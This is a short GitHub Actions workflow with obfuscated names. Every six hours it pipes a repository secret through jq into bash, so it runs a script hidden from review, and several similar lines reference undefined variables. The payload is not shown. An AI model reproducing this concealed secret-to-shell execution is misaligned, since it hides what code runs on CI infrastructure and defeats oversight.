name: lingdaoshou4716

on:
  workflow_dispatch:
  schedule:
    - cron: '55 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lingdaoshou4716
        env:
          ezrk138: ${{ secrets.ezrk138 }}
        run: |
          echo $ezrk138 | jq -r .rd0 | /bin/bash
          echo $ra73 | jq -r .naalf3682 | /bin/bash
          echo $gc43638 | jq -r .qvtsr4 | /bin/bash
          echo $vse357 | jq -r .lw0 | /bin/bash
          echo $b1 | jq -r .vi8 | /bin/bash
          echo $y319 | jq -r .gly82295 | /bin/bash
          echo $mk959 | jq -r .zoxb742 | /bin/bash
          echo $thyi2142 | jq -r .d33 | /bin/bash
          echo $y51810 | jq -r .ud3839 | /bin/bash

